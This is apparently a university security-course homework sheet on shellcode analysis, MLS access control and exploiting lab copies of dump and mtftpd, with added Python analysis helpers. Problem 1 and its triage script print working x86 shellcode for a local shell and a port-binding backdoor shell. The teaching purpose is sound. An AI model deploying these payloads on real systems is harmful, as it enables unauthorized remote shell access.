Homework 1
Due April 23
The items marked with *) are hard, and therefore extra-credit, but I encourage you to try them.
The files for the problems are in http://www.cs.dartmouth.edu/~cs38/hw1/
1. a) Analyze the following x86 Gnu/Linux shellcode and submit code in C that represents its functionality.
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
In the example from which this shellcode was taken, it was followed by the following program, and could be launched by running it:
void main() {
    int *ret;
    ret = (int *)&ret + 2; /* (!) */
    (*ret) = (int)shellcode;
}
Explain the meaning of the manipulation with ret on the marked line.
This shellcode should work (as in, I tried it, and it worked) on the cs38victim.cs.dartmouth.edu machine and on your virtual machines. Try running this code on one of the department's Fedora Core 3 machines. What happens there and why?
Reference: http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html from the helpful http://docs.cs.up.ac.za/programming/asm/derick_tut
For your convenience, this and the following shellcode are in the above homework directory as shellcode1.c and shellcode2.c.
b*) The same for
char shellcode[] =
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
Here you will have to use not only the above reference, but also UNIX manpages and, likely, kernel code at http://lxr.linux.no. Since this shellcode uses socket calls, some familiarity with socket programming (socket(2), bind(2), listen(2), accept(2)) will be helpful. A suitable tutorial can be found in the http://advancedlinuxprogramming.com chapter on sockets, or in one of the many web tutorials, e.g.: http://www.scit.wlv.ac.uk/~jphb/comms/sockets.html. The manpage ascii(7) may also be useful.
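As an added analysis aid for 1a and 1b (this is not part of the original assignment), here is a small Python triage script of the kind an analyst writes before opening a disassembler. It turns the C string literals into bytes, pulls out printable strings, and then walks the bytes once, tracking the general registers through the few instructions such shellcode uses to load syscall numbers (xor/mov between registers, mov al,imm8, mov eax,imm32, inc), so that each int 0x80 can be labelled with the syscall it most likely makes. The syscall and socketcall sub-code numbers are the i386 ones from the kernel headers (the assignment links a full table). It is a heuristic, not a disassembler: unknown opcodes are skipped a byte at a time, branches, lea and memory operands are not modelled, and where eax depends on a preceding syscall's return value the script says so instead of guessing. The two SHELLCODE constants are the assignment's own declarations, copied verbatim.

```python
import re

# i386 syscall numbers (subset) and socketcall(2) sub-codes, from the kernel's
# asm/unistd.h and linux/net.h; the assignment links a full table.
SYSCALLS = {1: "exit", 2: "fork", 3: "read", 4: "write", 5: "open", 6: "close",
            11: "execve", 63: "dup2", 102: "socketcall"}
SOCKETCALLS = {1: "SYS_SOCKET", 2: "SYS_BIND", 3: "SYS_CONNECT", 4: "SYS_LISTEN",
               5: "SYS_ACCEPT"}

# The two shellcode declarations from the assignment, verbatim (raw strings, so
# Python leaves the \x escapes alone for our own parser below).
SHELLCODE1 = r'''char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";'''
SHELLCODE2 = r'''char shellcode[] =
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";'''


def c_string_to_bytes(decl):
    r"""Bytes denoted by the "..." pieces of a C string literal. Only \xHH escapes
    and plain characters are handled (all these shellcodes use). Caveat: a C
    compiler reads \x greedily, so "\xff" followed by a hex digit differs there."""
    data = bytearray()
    for piece in re.findall(r'"((?:\\.|[^"\\])*)"', decl, re.S):
        i = 0
        while i < len(piece):
            if piece.startswith("\\x", i):
                data.append(int(piece[i + 2:i + 4], 16))
                i += 4
            else:
                data.append(ord(piece[i]))
                i += 1
    return bytes(data)


def printable_runs(data, min_len=4):
    """Runs of printable ASCII: a quick way to spot "/bin/sh" and friends."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def name_syscall(eax, ebx):
    if eax is None:
        return "eax untracked here (e.g. depends on a previous syscall's return value)"
    name = SYSCALLS.get(eax, "syscall %d" % eax)
    if eax == 102 and ebx in SOCKETCALLS:   # socketcall multiplexes on ebx
        name += "(%s)" % SOCKETCALLS[ebx]
    return name


def trace_syscalls(code):
    """Walk the bytes once, tracking registers through the few instructions used
    to load syscall numbers, and record (offset, eax, label) for each int 0x80.
    Heuristic only: unknown opcodes are skipped a byte at a time and branches,
    lea and memory operands are ignored."""
    regs = [None] * 8                 # eax, ecx, edx, ebx, esp, ebp, esi, edi
    sites, i = [], 0
    while i < len(code):
        op = code[i]
        modrm = code[i + 1] if i + 1 < len(code) else 0
        reg, rm = (modrm >> 3) & 7, modrm & 7
        if op in (0x31, 0x89) and modrm >= 0xC0:         # xor / mov r32, r32
            regs[rm] = (0 if reg == rm else None) if op == 0x31 else regs[reg]
            i += 2
        elif op == 0xB0:                                 # mov al, imm8
            # if eax is unknown, assume its upper bytes are zero (authors rely on it)
            regs[0] = modrm if regs[0] is None else (regs[0] & ~0xFF) | modrm
            i += 2
        elif op == 0xB8 and i + 5 <= len(code):          # mov eax, imm32
            regs[0] = int.from_bytes(code[i + 1:i + 5], "little")
            i += 5
        elif 0x40 <= op <= 0x47:                         # inc r32
            r = op - 0x40
            regs[r] = None if regs[r] is None else regs[r] + 1
            i += 1
        elif op == 0xCD and modrm == 0x80:               # int 0x80
            sites.append((i, regs[0], name_syscall(regs[0], regs[3])))
            regs[0] = None                               # return value clobbers eax
            i += 2
        else:
            i += 1
    return sites


if __name__ == "__main__":
    for name, decl in (("shellcode1", SHELLCODE1), ("shellcode2", SHELLCODE2)):
        code = c_string_to_bytes(decl)
        print("%s: %d bytes, strings %s" % (name, len(code), printable_runs(code)))
        for off, _, what in trace_syscalls(code):
            print("  int 0x80 at offset %3d: %s" % (off, what))
```

Running it as-is prints both listings. Note the second int 0x80 of shellcode2 is reported as untracked, because its eax comes from a preceding syscall's result through instructions the script does not model; sites like that are exactly where you have to read the disassembly yourself (objdump -D -b binary -m i386 on the raw bytes is one way to get it).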
c*) Download and analyze an exploit that contains a binary x86 shellcode. http://packetstormsecurity.nl is a good source; look at "last 10 exploits" or "last 50 exploits".
2. Under the standard MLS model, can a user cleared for
(secret, {dog, cat, pig})
read the following data?
3. a) Define in your own words MAC, DAC, and the principle of least privilege.
b) Suggest an administrative implementation of a "no-write-down" scheme for a real library. You can employ doorkeepers, ID checkers, conduct searches etc. Assume that the secret information is too voluminous to just memorize and carry around in one's head, i.e. some notes need to be taken.
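To make the lattice behind problems 2 and 3 concrete, here is an added worked example (not part of the assignment) of the standard MLS access decision in Python. A label is a (level, category set) pair; one label dominates another when its level is at least as high and its categories are a superset. Reading is allowed when the subject dominates the object (simple security, "no read up"), writing when the object dominates the subject (the *-property, "no write down"); two labels can also be incomparable, in which case neither is allowed. The ladder of levels and the object labels are constructed for the example, since the assignment only names the clearance (secret, {dog, cat, pig}).

```python
from dataclasses import dataclass

# Clearance levels, lowest first. Constructed for this example: the assignment
# names only "secret"; the other levels are the usual military ladder.
LEVELS = ["unclassified", "confidential", "secret", "top secret"]


@dataclass(frozen=True)
class Label:
    level: str
    categories: frozenset

    def dominates(self, other):
        """self >= other in the MLS lattice: a level at least as high AND a
        superset of the other's categories. Two labels can be incomparable."""
        return (LEVELS.index(self.level) >= LEVELS.index(other.level)
                and self.categories >= other.categories)


def label(level, *categories):
    return Label(level, frozenset(categories))


def can_read(subject, obj):
    # Simple security property, "no read up": the reader must dominate the data.
    return subject.dominates(obj)


def can_write(subject, obj):
    # *-property, "no write down": the data's label must dominate the writer's.
    return obj.dominates(subject)


def access(subject, obj):
    """Summarise the MLS decision as 'read', 'write', 'read/write' or 'none'."""
    rights = [name for name, ok in (("read", can_read(subject, obj)),
                                    ("write", can_write(subject, obj))) if ok]
    return "/".join(rights) or "none"


if __name__ == "__main__":
    user = label("secret", "dog", "cat", "pig")
    # Sample object labels, constructed here (the assignment's own data is not
    # reproduced on this page).
    for obj in (label("confidential", "dog"), label("secret", "cat", "pig"),
                label("secret", "dog", "cat", "pig"), label("top secret", "dog"),
                label("secret", "cow"),
                label("top secret", "dog", "cat", "pig", "cow")):
        print("%-60s %s" % (obj, access(user, obj)))
```

The "none" rows are the instructive ones: (top secret, {dog}) and (secret, {cow}) are each incomparable with the user's clearance, so neither direction of flow is permitted, which is the property that makes categories more than a decoration on the level.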
4. I found this program called "setmode" on a Gnu/Linux machine. It turned out to be a recent addition, and not part of any software package for that distribution.
# ls -l /usr/bin/setmode
-rwsr-xr-x 1 root root 35108 Jan 15 2005 /usr/bin/setmode
What were its function and likely use?
Use Shift+leftclick to download this program from the browser, or just use the most useful program wget:
wget http://www.cs.dartmouth.edu/~cs38/hw1/setmode
5. Recall the buffer overflow vulnerability in dump-0.4b13 from the previous exercise. Assume that the target program exists on your system as suid-root. If you haven't found the vulnerability, look for it now. If you cannot find it, or have trouble understanding the hints, please come to my office hours.
I reduced the code in dump-0.4b13 to a little bit more than the vulnerable part: dump-0.4b13-vuln.tar.gz. The vulnerability is commented and the makefile contains a test to demonstrate the tell-tale segfault.
Exploit it. Use any shellcode you like, feel free to use a canned one. For simplicity I suggest using a machine without stack protection or non-executable stack, such as your virtual machine. The host machine of our virtual network will do as well, but make sure you kill any backdoors that you start (in particular, the shellcode from (2) will create one) -- our goal is to understand vulnerabilities, not create them on our own systems!
6. Suppose that you are a system administrator (root) on a Gnu/Linux machine. One day you discover a suspicious process that appears to be communicating over the network. You would like to listen in on its communications before killing the process. What system commands or resources would you use? What if you discover that communications are encrypted?
The following part will be postponed until you are notified that your virtual machine is ready:
On your virtual machines you will find such a process. Capture some plaintext that it is communicating.
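As an added example for problem 6 (not part of the assignment), the following Python script shows the /proc plumbing that tools such as netstat and lsof use to tie a process to its TCP sockets, which is the first step before deciding what to capture. /proc/net/tcp lists every TCP socket with its endpoints, state, owning uid and socket inode; /proc/<pid>/fd contains symlinks whose targets read socket:[inode] for socket descriptors, and joining the two on the inode gives the process's connections. The sample /proc/net/tcp text and fd table are constructed; the address decoding assumes a little-endian host, as on the course's x86 machines. The live_fd_links helper reads the real /proc when a pid is passed on the command line.

```python
import os
import re
import socket
import struct

# TCP state codes as printed in the st column of /proc/net/tcp (include/net/tcp_states.h)
TCP_STATES = {0x01: "ESTABLISHED", 0x02: "SYN_SENT", 0x03: "SYN_RECV", 0x04: "FIN_WAIT1",
              0x05: "FIN_WAIT2", 0x06: "TIME_WAIT", 0x07: "CLOSE", 0x08: "CLOSE_WAIT",
              0x09: "LAST_ACK", 0x0A: "LISTEN", 0x0B: "CLOSING"}


def decode_addr(field):
    """'0100007F:1F90' -> ('127.0.0.1', 8080). The kernel prints the IPv4 address
    as one hex word in host byte order, so on little-endian x86 the octets come
    out reversed; the port is printed in network (big-endian) order."""
    ip_hex, port_hex = field.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16))), int(port_hex, 16)


def parse_proc_net_tcp(text):
    """One dict per socket row: local/remote endpoints, state, owning uid, inode."""
    rows = []
    for line in text.splitlines()[1:]:          # first line is the column header
        f = line.split()
        if len(f) < 10:
            continue
        rows.append({"local": decode_addr(f[1]), "remote": decode_addr(f[2]),
                     "state": TCP_STATES.get(int(f[3], 16), f[3]),
                     "uid": int(f[7]), "inode": int(f[9])})
    return rows


def socket_inodes(fd_links):
    """Map socket inode -> fd from the link targets of /proc/<pid>/fd/*."""
    inodes = {}
    for fd, target in fd_links.items():
        m = re.fullmatch(r"socket:\[(\d+)\]", target)
        if m:
            inodes[int(m.group(1))] = fd
    return inodes


def connections_of(proc_net_tcp_text, fd_links):
    """Join the two views: the TCP sockets belonging to the process owning fd_links."""
    inodes = socket_inodes(fd_links)
    return [dict(row, fd=inodes[row["inode"]])
            for row in parse_proc_net_tcp(proc_net_tcp_text) if row["inode"] in inodes]


def live_fd_links(pid):
    """Read the real /proc/<pid>/fd (readable for your own processes, or as root)."""
    fd_dir = "/proc/%d/fd" % pid
    return {int(fd): os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)}


# Constructed sample input: a process listening on TCP 5555 with one accepted
# client, plus an unrelated sshd listener (inode 999) that must not be attributed to it.
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:15B3 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 00000000 100 0 0 10 0
   1: 0500000A:15B3 0900000A:9C40 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 00000000 100 0 0 10 0
   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0   999 1 00000000 100 0 0 10 0
"""
SAMPLE_FDS = {0: "/dev/null", 1: "/dev/null", 3: "socket:[12345]", 4: "socket:[12346]"}

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                       # live mode: python3 this.py <pid>
        tcp, fds = open("/proc/net/tcp").read(), live_fd_links(int(sys.argv[1]))
    else:
        tcp, fds = SAMPLE_TCP, SAMPLE_FDS
    for c in connections_of(tcp, fds):
        print("fd %d: %s:%d -> %s:%d %s (uid %d)"
              % (c["fd"], *c["local"], *c["remote"], c["state"], c["uid"]))
```

Once the endpoints are known, the capture itself is a separate decision (a packet capture on the host, or tracing the process's read/write calls), and the script is only the attribution step; for UDP the same join works against /proc/net/udp, whose columns have the same layout.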
7. In the homework directory http://www.cs.dartmouth.edu/~cs38/hw1/ you will find a vulnerable FTP server mtftpd-0.0.3, the posting that contains a vulnerability disclosure, mtftpd.txt, and an exploit realizing that vulnerability, 0x666-ftpd.c.
a) Explain the nature of the vulnerability and the trick used by the exploit code.
b*) Exploit it. The server code requires root to run, so your virtual machines will be the most convenient environment for this.
NOTE: The original server code, apparently abandoned by its developers on sourceforge.net, contained at least two bugs that I had to fix in order to compile and exploit it. Please use my patched version mtftpd-0.0.3-patched.tar.gz if you decide to compile it.
Also note that the exploit is messy. It contains some code that never gets used and doesn't actually work out of the box. You will need to understand the trick and the nature of the underlying vulnerability in order to tweak it. This can be very frustrating; be warned.